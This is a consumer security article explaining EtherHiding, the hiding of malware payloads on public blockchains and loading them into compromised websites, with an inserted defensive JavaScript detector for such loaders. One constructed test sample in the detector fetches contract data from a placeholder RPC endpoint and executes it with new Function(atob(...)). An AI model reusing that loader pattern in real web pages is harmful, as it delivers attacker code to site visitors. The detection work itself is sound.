7 min read

You lock your doors at night, but what about your computer? Researchers have uncovered a sneaky new hacking trick that bypasses our usual online safeguards.
They call the technique EtherHiding. It stores encoded payloads on public blockchains and uses read-only queries, so the delivery step leaves fewer obvious network indicators for standard web scanners to detect.
Security teams have observed both a DPRK-linked cluster and a financially motivated cluster using EtherHiding.

So, how does this ghost hack actually work? Instead of sending a suspicious file, attackers hide malicious code inside a public blockchain. This is the same technology that powers cryptocurrencies like Bitcoin. Think of the blockchain as a massive, public digital ledger that nobody can erase or alter.
A small loader script on a compromised page will query a smart contract or transaction data via read-only API calls, retrieve an encoded JavaScript payload, and evaluate it in memory.
In many cases, the payload runs without a visible file download, though some campaigns still rely on social engineering to get victims to run a local command.

This method complicates detection for site scanning and signature-based protections because the payload lives on a public blockchain and can be retrieved via read-only calls. However, endpoint detection and modern EDR tools may still flag suspicious in-memory behavior or unusual network calls.
The harmful code is simply fetched from a public, seemingly neutral source, which can leave site scanners and signature-based protections blind to the real danger unfolding right in front of them.
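The loader shape described above (read-only chain query, decode, execute in memory) is also what a defender can look for. The following is an added example, not code from the article or from the researchers it cites: a static heuristic that scores script bodies collected from a page or a WordPress theme file, flagging scripts that combine a read-only JSON-RPC query with dynamic code execution. The indicator regexes, weights and sample scripts are assumptions constructed for illustration.

```javascript
// Added example (not from the article): static heuristic for EtherHiding-style
// loaders. Indicator regexes and weights are illustrative assumptions.

const INDICATORS = [
  // read-only JSON-RPC methods that return contract or transaction data
  { name: 'readonly_chain_query', re: /["'](?:eth_call|eth_getTransactionByHash|eth_getStorageAt)["']/, weight: 3 },
  // JSON-RPC envelope, present in legitimate dapps as well as loaders
  { name: 'jsonrpc_envelope', re: /["']jsonrpc["']\s*:\s*["']2\.0["']/, weight: 1 },
  // decoding an opaque string before it is used
  { name: 'payload_decode', re: /\batob\(|String\.fromCharCode|\\x[0-9a-f]{2}/i, weight: 1 },
  // turning a string into executable code
  { name: 'dynamic_eval', re: /\beval\(|new\s+Function\(|\.innerHTML\s*=/, weight: 3 },
];

function scoreScript(source) {
  const hits = INDICATORS.filter(i => i.re.test(source));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  const names = hits.map(i => i.name);
  let verdict = 'clean';
  if (names.includes('readonly_chain_query') && names.includes('dynamic_eval')) {
    verdict = 'suspicious'; // query + execute in one script is the loader shape
  } else if (score >= 3) {
    verdict = 'review';     // e.g. a legitimate dapp that only reads the chain
  }
  return { score, hits: names, verdict };
}

// Scan a list of script bodies and return only the ones worth a look.
function scanPage(scripts) {
  return scripts
    .map((src, index) => ({ index, ...scoreScript(src) }))
    .filter(r => r.verdict !== 'clean');
}

// Constructed samples: an analytics snippet, a dapp that only reads a token
// balance, and a loader-shaped fragment that reads chain data and executes it.
const SAMPLES = [
  "window.dataLayer = window.dataLayer || []; dataLayer.push({event: 'pageview'});",
  "fetch(RPC, {method: 'POST', body: JSON.stringify({jsonrpc: '2.0', method: 'eth_call', params: [{to: TOKEN, data: SEL}, 'latest'], id: 1})}).then(r => r.json()).then(j => ui.setBalance(j.result));",
  `fetch(RPC, {method: 'POST', body: '{"jsonrpc":"2.0","method":"eth_call","params":[{"to":C,"data":D},"latest"],"id":1}'}).then(r => r.json()).then(j => new Function(atob(j.result.slice(2)))());`,
];

console.log(JSON.stringify(scanPage(SAMPLES), null, 2));
```

The second sample shows the main source of noise: a legitimate dapp also issues eth_call, so it lands in 'review' rather than 'suspicious', and the combination with dynamic execution is what separates the loader.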

To start the infection, hackers first need you to visit a compromised site. They often break into legitimate, but poorly secured, websites built on platforms like WordPress. They do not take the whole site down, as that would be far too obvious.
Instead, they secretly inject a tiny, harmless-looking piece of code into the website’s framework. This small bit of code is the digital trapdoor, cleverly disguised to blend with normal website data. When your browser loads the page, it unknowingly runs this malicious script.

Once the hidden code is on your computer, the real damage begins. The malware can act as a silent spy, recording every keystroke to steal passwords and logins.
If the malware extracts browser wallet keys or session cookies from wallets like MetaMask or Phantom, attackers can drain those wallets or abuse session tokens to move funds.
In other cases, the malware might lock all your files and demand a ransom to unlock them. Since the hackers have a persistent backdoor into your system, they can also steal sensitive personal documents or company secrets.

Google Threat Intelligence Group reported DPRK-attributed activity using EtherHiding and tracked that cluster as UNC5342, while Mandiant and GTIG also documented a second, financially motivated cluster, tracked as UNC5142, using similar on-chain techniques.
This state-backed support means the hackers are well-resourced, highly skilled, and patient. They are part of a coordinated, national effort to steal money and gather intelligence. This makes them a particularly persistent and dangerous threat to everyone online.

Often, the hackers actively lure targets through clever social engineering. They might pose as recruiters on professional networks like LinkedIn, offering fake high-paying jobs in the tech industry. They engage in lengthy conversations to build trust with their potential victims.
Eventually, they send a “technical skills test” as part of the interview process. This file, hosted on a legitimate-looking site, contains the initial loader that connects to the blockchain. The victim, thinking they are taking a real test, willingly downloads and runs the file.

Using blockchain for malware is a significant escalation in cybercrime. It represents a move toward next-generation bulletproof hosting. Hackers are exploiting the very features that make blockchain secure, its permanence and decentralization, to protect their own malicious operations.
If this technique becomes widespread, it could render many current digital defenses obsolete. Criminals of all kinds could launch attacks that are nearly impossible to trace or stop at their source. We could be facing a new era of persistent and invisible online threats.

While the threat is sophisticated, you are not powerless. The first line of defense is to keep all your software updated, especially your web browser and operating system. These updates often include patches for security flaws that hackers love to exploit.
Be extremely cautious about downloading files or clicking links, even from people you’ve just met online. If a “recruiter” asks you to run a program for an interview, it’s a major red flag. Legitimate companies have secure and transparent hiring processes.

Google and other cybersecurity companies are actively tracking these threats. They are working on new ways to detect unusual activity, like monitoring for browser behavior that secretly communicates with blockchain networks. Their research is crucial for developing next-generation security tools.
These firms also collaborate with blockchain API providers and web hosting services. By identifying and blocking the intermediary services hackers use, they can disrupt the attack chain. This is a vital step, even if they cannot delete the malicious smart contract itself.

The core strength of this attack is its misuse of a trusted system. We are taught that blockchain is secure and transparent, so the idea that it can be used for harm is a clever trick. The hackers have found a way to weaponize trust itself.
Furthermore, the low cost and high resilience make it perfect for hackers. Updating the attack to deliver new malware can cost less than a dollar in transaction fees. Meanwhile, their attack platform is permanently hosted on an unstoppable global network.

Security experts are concerned that this is just the beginning. They warn that combining this blockchain-hiding technique with artificial intelligence could create self-spreading attacks. AI could help tailor more convincing phishing lures or automatically find new websites to compromise.
The battle between hackers and defenders is an ongoing arms race. As we develop new technologies, they find ways to abuse them. This latest development proves that the digital landscape is constantly changing, requiring our constant vigilance.

Your best defense combines good technology with smart habits. Use a reputable security suite and enable safe browsing features for real-time protection against malicious sites. For an extra layer of security, consider using a browser that can block scripts from running automatically.
Always think before you click, and be skeptical of offers that seem too good to be true. The internet is an amazing tool, but it pays to be cautious. By staying aware of these new threats, you can significantly reduce your risk of falling victim.
Dan Mitchell has been in the computer industry for more than 25 years, getting started with computers at age 7 on an Apple II.